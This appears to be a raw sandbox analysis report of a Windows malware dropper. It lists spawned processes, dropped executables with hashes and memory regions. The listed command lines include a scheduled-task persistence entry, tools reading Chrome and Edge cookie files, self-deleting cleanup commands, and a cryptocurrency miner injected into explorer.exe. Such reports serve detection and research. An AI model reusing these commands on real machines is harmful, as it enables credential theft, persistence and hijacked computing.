"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\system32\rUNdlL32.eXe

rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

C:\Windows\SysWOW64\rundll32.exe

rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Users\Admin\AppData\Local\Temp\askinstall54.exe

"C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"

C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe

"C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\pub1.exe

"C:\Users\Admin\AppData\Local\Temp\pub1.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe

C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS47EC.tmp\Install.cmd" "

C:\Users\Admin\AppData\Roaming\system64.exe

"C:\Users\Admin\AppData\Roaming\system64.exe"

C:\Users\Admin\Documents\0KP102jSxIfodbztguukb0UO.exe

"C:\Users\Admin\Documents\0KP102jSxIfodbztguukb0UO.exe"

C:\Users\Admin\Documents\R6fLTGUWTxnOaRl3lzzm6L0q.exe

"C:\Users\Admin\Documents\R6fLTGUWTxnOaRl3lzzm6L0q.exe"

C:\Users\Admin\Documents\NXe1_S23sqOurzWYRdTMPYHZ.exe

"C:\Users\Admin\Documents\NXe1_S23sqOurzWYRdTMPYHZ.exe"

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

"C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe"

C:\Users\Admin\Documents\7Y4wgnMMaR3q65GXhGbUCfdp.exe

"C:\Users\Admin\Documents\7Y4wgnMMaR3q65GXhGbUCfdp.exe"

C:\Users\Admin\Documents\ZkB3ER98azKx0Ea9mL5XyFpY.exe

"C:\Users\Admin\Documents\ZkB3ER98azKx0Ea9mL5XyFpY.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'

C:\Users\Admin\Documents\BfNWgdMHfj8X1vBRorcQ0KnE.exe

"C:\Users\Admin\Documents\BfNWgdMHfj8X1vBRorcQ0KnE.exe"

C:\Users\Admin\Documents\xCZ4etkup7sdvkCcWCLUCqQK.exe

"C:\Users\Admin\Documents\xCZ4etkup7sdvkCcWCLUCqQK.exe"

C:\Users\Admin\Documents\jRt1TQVGU9skoXxsd4io9d0X.exe

"C:\Users\Admin\Documents\jRt1TQVGU9skoXxsd4io9d0X.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 812

C:\Users\Admin\Documents\MOPm2aWllbKWPINFLmw1q6Bb.exe

"C:\Users\Admin\Documents\MOPm2aWllbKWPINFLmw1q6Bb.exe"

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

"C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe"

C:\Users\Admin\Documents\kJA_LxHro_HNkQwCmmu_OarH.exe

"C:\Users\Admin\Documents\kJA_LxHro_HNkQwCmmu_OarH.exe"

C:\Users\Admin\Documents\DKtQCHXhQxQaZznr5jVn2orU.exe

"C:\Users\Admin\Documents\DKtQCHXhQxQaZznr5jVn2orU.exe"

C:\Users\Admin\Documents\biX4hee48umM0gNqF7fn_vOZ.exe

"C:\Users\Admin\Documents\biX4hee48umM0gNqF7fn_vOZ.exe"

C:\Users\Admin\Documents\EfnLljmSkZc_7o5rt6klWdGN.exe

"C:\Users\Admin\Documents\EfnLljmSkZc_7o5rt6klWdGN.exe"

C:\Users\Admin\Documents\8SSNV3Yak9vApQeqMDfWq0Q5.exe

"C:\Users\Admin\Documents\8SSNV3Yak9vApQeqMDfWq0Q5.exe"

C:\Users\Admin\Documents\5Lde95vLslywRqqA6Y06YyjF.exe

"C:\Users\Admin\Documents\5Lde95vLslywRqqA6Y06YyjF.exe"

C:\Users\Admin\Documents\A3ygo1rZYNvgHnO3hO9e_eOM.exe

"C:\Users\Admin\Documents\A3ygo1rZYNvgHnO3hO9e_eOM.exe"

C:\Users\Admin\Documents\biRtj61UfpoGm7HHHdacryQC.exe

"C:\Users\Admin\Documents\biRtj61UfpoGm7HHHdacryQC.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd < Pura.vssm

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 800

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Users\Admin\Documents\7Y4wgnMMaR3q65GXhGbUCfdp.exe

C:\Users\Admin\Documents\7Y4wgnMMaR3q65GXhGbUCfdp.exe

C:\Users\Admin\Documents\xCZ4etkup7sdvkCcWCLUCqQK.exe

C:\Users\Admin\Documents\xCZ4etkup7sdvkCcWCLUCqQK.exe

C:\Users\Admin\Documents\R6fLTGUWTxnOaRl3lzzm6L0q.exe

C:\Users\Admin\Documents\R6fLTGUWTxnOaRl3lzzm6L0q.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 892

C:\Users\Admin\Documents\5Lde95vLslywRqqA6Y06YyjF.exe

C:\Users\Admin\Documents\5Lde95vLslywRqqA6Y06YyjF.exe

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

C:\Users\Admin\Documents\eqsLqB_7vihKk1O2zmBdAVVz.exe

C:\Users\Admin\AppData\Local\Temp\11111.exe

C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\Documents\kJA_LxHro_HNkQwCmmu_OarH.exe

"C:\Users\Admin\Documents\kJA_LxHro_HNkQwCmmu_OarH.exe" -a

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 848

C:\Users\Admin\AppData\Local\Temp\11111.exe

C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

C:\Users\Admin\Documents\NV8Lrgrfij6vpWD_c7k3VuAg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 904

C:\Users\Admin\Documents\MOPm2aWllbKWPINFLmw1q6Bb.exe

"C:\Users\Admin\Documents\MOPm2aWllbKWPINFLmw1q6Bb.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 1020

C:\Windows\system32\rUNdlL32.eXe

rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

C:\Windows\SysWOW64\rundll32.exe

rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 992

C:\Users\Admin\AppData\Local\Temp\22222.exe

C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Roaming\fwgtarf

C:\Users\Admin\AppData\Roaming\fwgtarf

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "biRtj61UfpoGm7HHHdacryQC.exe" /f & erase "C:\Users\Admin\Documents\biRtj61UfpoGm7HHHdacryQC.exe" & exit

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\22222.exe

C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "biRtj61UfpoGm7HHHdacryQC.exe" /f

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=80

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe" & del C:\ProgramData\*.dll & exit

Network


Files

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libwinpthread-1.dll

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libgcc_s_dw2-1.dll

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libcurl.dll

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libcurlpp.dll

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libcurl.dll

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\libstdc++-6.dll

\Users\Admin\AppData\Local\Temp\7zSCAC60004\libstdc++-6.dll

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.exe

C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

C:\Users\Admin\AppData\Local\Temp\Install2.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe
SHA512 28e2568646d8a103e138a0f5bc15a785aeb6b41f87c30be9db556c4baf58a25902bb94cb72d861cbfc24f3829342d50ce891e0637ccd04ac9252abe60b33ab4d

C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

MD5 1eba952dd3974898cd98fbc8807b6929
SHA1 963289ab1f6af6b34fc596bb0464947e230db350
SHA256 6725aa9db031f924217cc47b78f53f03aafa329eb15906a910f21abc05116315
SHA512 18a23964951d6ba123f92b53cef1e70f4840803675c884ae4f128e55eecb6667ad456b164ca9ff47eaf01256ad0d46de69c520b16ab5af58175c13e759c20397

memory/3092-175-0x0000000000920000-0x0000000000943000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.exe

MD5 aebba1a56e0d716d2e4b6676888084c8
SHA1 fb0fc0de54c2f740deb8323272ff0180e4b89d99
SHA256 6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b
SHA512 914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

memory/3944-197-0x00000000014A0000-0x00000000014A1000-memory.dmp

memory/4212-198-0x0000000000000000-mapping.dmp

memory/2120-160-0x00000000007B0000-0x00000000007B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

memory/2644-202-0x00000000007D0000-0x00000000007D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

memory/3708-147-0x0000000000000000-mapping.dmp

memory/3944-204-0x000000001B7A0000-0x000000001B7C3000-memory.dmp

memory/3944-205-0x000000001B840000-0x000000001B842000-memory.dmp

memory/3944-206-0x00000000014B0000-0x00000000014B1000-memory.dmp

memory/4344-208-0x0000000000000000-mapping.dmp

memory/4344-212-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 efc352d21b18e468273577da51189c2e
SHA1 c832eb34a76b866aa3acccb705476832683d9e73
SHA256 cbf481dda581c5e9840f4c3c1a38c3d9ddd7ff6f244e6afa37c1cce9c6214fba
SHA512 143a5d5d1dcb9c80e5ae34b2d2fae19471496513a7f131f6eb48278e673545df014b19689b305e8ef411506fa482b8665e344012810a76df75a472b3e5df2059

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 efc352d21b18e468273577da51189c2e
SHA1 c832eb34a76b866aa3acccb705476832683d9e73
SHA256 cbf481dda581c5e9840f4c3c1a38c3d9ddd7ff6f244e6afa37c1cce9c6214fba
SHA512 143a5d5d1dcb9c80e5ae34b2d2fae19471496513a7f131f6eb48278e673545df014b19689b305e8ef411506fa482b8665e344012810a76df75a472b3e5df2059

\Users\Admin\AppData\Local\Temp\CC4F.tmp

MD5 50741b3f2d7debf5d2bed63d88404029
SHA1 56210388a627b926162b36967045be06ffb1aad3
SHA256 f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c
SHA512 fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

memory/2644-207-0x0000000005000000-0x0000000005001000-memory.dmp

memory/2644-214-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\axhub.dll

MD5 1c7be730bdc4833afb7117d48c3fd513
SHA1 dc7e38cfe2ae4a117922306aead5a7544af646b8
SHA256 8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1
SHA512 7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

memory/4544-216-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\axhub.dll

MD5 1c7be730bdc4833afb7117d48c3fd513
SHA1 dc7e38cfe2ae4a117922306aead5a7544af646b8
SHA256 8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1
SHA512 7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

memory/4588-218-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\axhub.dat

MD5 99ab358c6f267b09d7a596548654a6ba
SHA1 d5a643074b69be2281a168983e3f6bef7322f676
SHA256 586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380
SHA512 952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

C:\Users\Admin\AppData\Local\Temp\3002.exe

MD5 e511bb4cf31a2307b6f3445a869bcf31
SHA1 76f5c6e8df733ac13d205d426831ed7672a05349
SHA256 56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA512 9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

memory/4664-222-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\askinstall54.exe

MD5 1c26d844eac983317d51664d92e26037
SHA1 0fcf6bdc38115bedea1a2c7b3fe9f028e85dc59c
SHA256 6c613e1e1c2f9e06505bd9f752af269d30317934278b0b91bd51a89c079cc2a3
SHA512 d06bee071f60aad1d12564fb7b211e737d7567d0acda7cc18b19b9b3a12ef6bff7282856b9e16382ad9b653b0e8cd259ba4a99930e947c5d59eaba74c0f26e06

C:\Users\Admin\AppData\Local\Temp\askinstall54.exe

MD5 1c26d844eac983317d51664d92e26037
SHA1 0fcf6bdc38115bedea1a2c7b3fe9f028e85dc59c
SHA256 6c613e1e1c2f9e06505bd9f752af269d30317934278b0b91bd51a89c079cc2a3
SHA512 d06bee071f60aad1d12564fb7b211e737d7567d0acda7cc18b19b9b3a12ef6bff7282856b9e16382ad9b653b0e8cd259ba4a99930e947c5d59eaba74c0f26e06

memory/3796-229-0x0000020AA7410000-0x0000020AA7481000-memory.dmp

memory/4744-230-0x0000000000000000-mapping.dmp

memory/4780-235-0x00007FF7977E4060-mapping.dmp

memory/2124-236-0x00000000008F0000-0x0000000000A3A000-memory.dmp

memory/2124-238-0x0000000000400000-0x00000000008EB000-memory.dmp

memory/4852-239-0x0000000000000000-mapping.dmp

memory/4544-244-0x0000000004BB0000-0x0000000004CB1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe

MD5 9cfa65c4d7300d02dc8db6dfcd662447
SHA1 adf8103369c24e04d3cebc500659ef9d50b605c5
SHA256 e3d556df0c1db47d21134214070f90c0ee000d47889ceecdb0fb19ab00f8b4d7
SHA512 d7288293ad35c45f1ccaac5f94ace2a6ff7ecead1a81f6b9f03ba1e081fa08e33df44891bc868e9fe48c34ef75f0fcfb261a03a2dda1e60e754c232488c2cc4c

C:\Users\Admin\AppData\Local\Temp\3002.exe

MD5 e511bb4cf31a2307b6f3445a869bcf31
SHA1 76f5c6e8df733ac13d205d426831ed7672a05349
SHA256 56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA512 9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

memory/4988-250-0x0000000000000000-mapping.dmp

memory/4544-252-0x0000000004A80000-0x0000000004ADD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pub1.exe

MD5 870e13b640e4e99c60c7f41ee4ea95bb
SHA1 68077dcdadefec55abb38514a65d34abb293273a
SHA256 7df446ede9c1db56f1196ae9dae181054f5b5970711d9bc6705cede1d804ef1a
SHA512 093ae54d30c8141cc3d73ca0dea69ccd799a2be2a4434d588466dcc00b3522f29fa40e2ec10c51950b032f8874c2723d6e807750fbd8bd624ae455b5a1978d07

C:\Users\Admin\AppData\Local\Temp\pub1.exe

MD5 870e13b640e4e99c60c7f41ee4ea95bb
SHA1 68077dcdadefec55abb38514a65d34abb293273a
SHA256 7df446ede9c1db56f1196ae9dae181054f5b5970711d9bc6705cede1d804ef1a
SHA512 093ae54d30c8141cc3d73ca0dea69ccd799a2be2a4434d588466dcc00b3522f29fa40e2ec10c51950b032f8874c2723d6e807750fbd8bd624ae455b5a1978d07

memory/1008-251-0x0000024AF7710000-0x0000024AF7781000-memory.dmp

memory/5088-257-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

MD5 b7161c0845a64ff6d7345b67ff97f3b0
SHA1 d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256 fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 f045d3467289a1b177b33c35c726e5ed
SHA1 01b96307874f1a1a277bf062e03f2a47a6c906d0
SHA256 a8e6248c5472e049abd81f8678457b9f94453a67cb6edb45578ed69a0b926bce
SHA512 5b76dab8503156f23506ee6e4834b46bb2611698edbc5d305eccea52d168c95eabd3343691ede96f8d0194fe69afd424795832ee03409a15f058d57cbc2d6e0d

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 f045d3467289a1b177b33c35c726e5ed
SHA1 01b96307874f1a1a277bf062e03f2a47a6c906d0
SHA256 a8e6248c5472e049abd81f8678457b9f94453a67cb6edb45578ed69a0b926bce
SHA512 5b76dab8503156f23506ee6e4834b46bb2611698edbc5d305eccea52d168c95eabd3343691ede96f8d0194fe69afd424795832ee03409a15f058d57cbc2d6e0d

memory/4852-263-0x0000000000740000-0x0000000000741000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe

MD5 9cfa65c4d7300d02dc8db6dfcd662447
SHA1 adf8103369c24e04d3cebc500659ef9d50b605c5
SHA256 e3d556df0c1db47d21134214070f90c0ee000d47889ceecdb0fb19ab00f8b4d7
SHA512 d7288293ad35c45f1ccaac5f94ace2a6ff7ecead1a81f6b9f03ba1e081fa08e33df44891bc868e9fe48c34ef75f0fcfb261a03a2dda1e60e754c232488c2cc4c

memory/4780-248-0x0000018B4D8D0000-0x0000018B4D941000-memory.dmp

memory/2304-268-0x00000174F0280000-0x00000174F02F1000-memory.dmp

memory/1088-269-0x000001FFCE870000-0x000001FFCE8E1000-memory.dmp

memory/2488-241-0x000001ED2C1D0000-0x000001ED2C241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 e4b4e8239211d0334ea235cf9fc8b272
SHA1 dfd916e4074e177288e62c444f947d408963cf8d
SHA256 d66743871377f6985465617bd4f1930c56479bff62708c559f6ba7e8125a624b
SHA512 ef98a1bf1b91a3a4045cd7ea64ab0ee6bb47eb82b2508abe580806f491b9ad97a736a1853f326580eca1bd597d80b6a05e59769a48e09852d5de485f44a0b4cf

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 e4b4e8239211d0334ea235cf9fc8b272
SHA1 dfd916e4074e177288e62c444f947d408963cf8d
SHA256 d66743871377f6985465617bd4f1930c56479bff62708c559f6ba7e8125a624b
SHA512 ef98a1bf1b91a3a4045cd7ea64ab0ee6bb47eb82b2508abe580806f491b9ad97a736a1853f326580eca1bd597d80b6a05e59769a48e09852d5de485f44a0b4cf

memory/3708-231-0x0000000000400000-0x000000000088F000-memory.dmp

memory/3796-225-0x0000020AA7350000-0x0000020AA739C000-memory.dmp

memory/4852-272-0x0000000004F20000-0x0000000004F96000-memory.dmp

memory/3708-223-0x0000000000030000-0x0000000000039000-memory.dmp

memory/2340-274-0x000001B23FFB0000-0x000001B240021000-memory.dmp

memory/3088-275-0x00000000018D0000-0x00000000018DA000-memory.dmp

memory/3088-277-0x0000000003660000-0x0000000003661000-memory.dmp

memory/3088-276-0x0000000003630000-0x0000000003632000-memory.dmp

memory/4600-282-0x0000000000400000-0x000000000041E000-memory.dmp

memory/4600-283-0x0000000000417E02-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3002.exe

MD5 e511bb4cf31a2307b6f3445a869bcf31
SHA1 76f5c6e8df733ac13d205d426831ed7672a05349
SHA256 56002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA512 9c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BIRZAC~1.EXE.log

MD5 7438b57da35c10c478469635b79e33e1
SHA1 5ffcbdfbfd800f67d6d9d6ee46de2eb13fcbb9a5
SHA256 b253c066d4a6604aaa5204b09c1edde92c410b0af351f3760891f5e56c867f70
SHA512 5887796f8ceb1c5ae790caff0020084df49ea8d613b78656a47dc9a569c5c86a9b16ec2ebe0d6f34c5e3001026385bb1282434cc3ffc7bda99427c154c04b45a

memory/4584-291-0x0000000000000000-mapping.dmp

memory/4472-296-0x0000000000000000-mapping.dmp

